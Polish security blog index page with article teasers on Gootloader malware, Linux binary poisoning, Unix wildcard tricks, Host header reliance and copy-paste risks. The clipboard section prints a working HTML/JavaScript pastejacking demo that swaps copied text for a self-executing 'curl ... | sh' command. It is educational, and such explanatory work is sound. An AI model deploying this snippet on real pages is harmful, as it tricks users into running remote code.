G

ootloader, czyli usługa wstępnego dostępu do (firmowych) sieci dla cyberprzestępców ostatnio rozszerzyła swój zakres działalności o różne cele na całym świecie. Przypomnijmy: w 2014 roku po raz pierwszy został zauważony trojan bankowy o nazwie Gootkit. Od tego czasu ewoluował, aby stać się bardziej złodziejem poufnych informacji obsługiwanym przez grupę aktorów. Nazwa ‘Gootkit’ jest często używana zamiennie – zarówno w odniesieniu do złośliwego oprogramowania, jak i do samej grupy. W marcu 2021 roku firma Sophos jako pierwsza zidentyfikowała szersze możliwości tego oprogramowania i nazwała go GootLoader. Ten oparty o Javascript framework pierwotnie przeznaczony do infekcji Gootkitem w coraz większym stopniu zaczął dostarczać szerszą gamę złośliwego oprogramowania (w tym ransomware). Wczesna aktywność kampanii platformy Gootloader została po raz pierwszy zauważona przez analityka zagrożeń z firmy Proofpoint pod koniec 2020 roku, a następnie zbadana i opisana przez ASEC, Malwarebytes i TrendMicro.
[ czytaj całość… ]

Z

atruwanie plików binarnych w Linuksie jest procesem, w którym atakujący podmienia często używane (dystrybucyjnie pre-instalowane) programy i narzędzia swoimi wersjami, które spełniają te same funkcje, ale dodatkowo wykonują złośliwe akcje. Może to być zastąpienie pliku nowym, zaprojektowanym tak, aby zachowywał się jak stare polecenie lub zmanipulowanie istniejącego (np. dopisanie na końcu instrukcji), aby bezpośrednio uruchamiało złośliwy kod. Próbkę tego procesu mogliśmy zobaczyć w ściągawce z informatyki śledczej w wykrywaniu włamań za pomocą linii poleceń Linuksa. Dzisiaj ją nieco rozwiniemy.
[ czytaj całość… ]

K

ilka lat temu dowiedzieliśmy się, że kopiowanie poleceń bezpośrednio do terminala może mieć trochę inne konsekwencję niż byśmy mogli się spodziewać. Dzisiaj nowoczesne API Javascript pozwalają witrynie internetowej w trywialny sposób zastępowanie tego, co umieścisz w schowku, bez potwierdzenia lub zgody użytkownika. Poniżej znajduje się przykład tego, jak łatwo jest wykonać ten atak:

<html>
<head>
<title>Kopiuj wklej demo</title>
</head>
<body>
<p id="skopiujmnie">$ echo "Wklej mnie do terminala!"</p>
<script>
document.getElementById('skopiujmnie').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', 'echo "A jednak wykonamy \
[curl https://nfsec.pl | sh]"\n');
e.preventDefault();
});
</script>
</body>
</html>

Powyższy kod możemy zapisać jako plik payload.html, wyświetlić w przeglądarce – zaznaczyć, skopiować wyświetlony tekst i wkleić do terminala. Należy zauważyć, że nie musimy nawet naciskać klawisza ENTER po wklejeniu, ponieważ ładunek kodu zawiera znak nowej linii, która to zrobi za nas.

Więcej informacji: Don’t Copy Paste Into A Shell

P

o pierwsze ten artykuł nie ma nic wspólnego z współczesnymi technikami hackingu jak obejście ASLR, eksploracją ROP, zdalnym 0day lub łańcuchem 14 różnych błędów, aby złamać Chrome. Nic z tych rzeczy. Omówimy jednak jedną technikę hackingu starej szkoły Uniksa, która działa nawet w dzisiejszych czasach. Technikę, o której (ku mojemu zdziwieniu) wiele osób związanych z bezpieczeństwem nigdy nie słyszało. Prawdopodobnie dlatego, że nikt wcześniej tak naprawdę o niej nie mówił. Dlatego postanowiłem opisać ten temat bo jest on dla mnie osobiście całkiem zabawny, aby przekonać się, co można zrobić za pomocą prostych sztuczek zatrucia wildcardów w Uniksie. Więc w dalszej części możnemy spodziewać się zbioru schludnych hacków na ten temat. Jeśli zastanawiasz się, jak podstawowe narzędzia Uniksa, jak “tar” lub “chown” mogą doprowadzić do kompromitacji systemu – czytaj dalej.
[ czytaj całość… ]

P

owszechną praktyką wśród programistów piszących własne webaplikacje oraz webowych frameworków odkrywających koło od nowa jest poleganie na wartościach zwracanych w nagłówku HTTP Host. Jest to bardzo wygodny sposób na gwarancję, że ta sama aplikacja zostanie uruchomiona na localhoście, serwerach środowiska: developerskiego, testowego, produkcyjnego, innych domenach i subdomenach itd., bez wprowadzania modyfikacji w kod aplikacji. Prosty przykład w PHP:
[ czytaj całość… ]

N

a pewno nie raz postępowaliśmy według następującego schematu: szukamy jakiegoś polecenia systemowego w Internecie, a że jest na tyle długie lub skomplikowane – kopiujemy je i wklejamy bezpośrednio do konsoli naszego systemu. Niestety nie zawsze to, co widzimy jest przez nas tylko kopiowane. Prosty przykład w kodzie HTML:
[ czytaj całość… ]